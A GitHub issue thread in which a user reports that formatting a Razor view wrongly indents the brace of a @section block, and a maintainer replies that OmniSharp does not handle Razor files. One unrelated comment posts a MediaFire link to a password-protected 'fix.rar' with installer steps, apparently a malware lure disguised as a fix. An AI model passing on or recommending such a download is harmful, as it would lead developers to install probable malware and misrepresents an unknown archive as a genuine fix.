### ISSUE TITLE
Section formatting issue in ASP.NET Razor view

### ISSUE THREAD

**Issue by mkorsukov** [OmniSharp/omnisharp-roslyn#2634]
There is a tiny formatting issue happening on `section` definition only.

Initial code:
```cs
@section Controls
{
  <label>
    <span>Office</span>
    // the rest of HTML
```

After the `Format document` command:
```cs
@section Controls
  {
  <label>
    <span>Office</span>
    // the rest of HTML
```

PS. The issue doesn't affect such blocks code like `layout` and `code`. So formatting remains the same.

```cs
@{
  Layout = "/Views/Acquisition/Layouts/MainLayout.cshtml";
}
```

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by JoeRobich** [comment]
@mkorsukov O# does not handle Razor files. Perhaps you meant to open an issue at https://github.com/dotnet/vscode-csharp/issues or https://github.com/dotnet/razor/issues
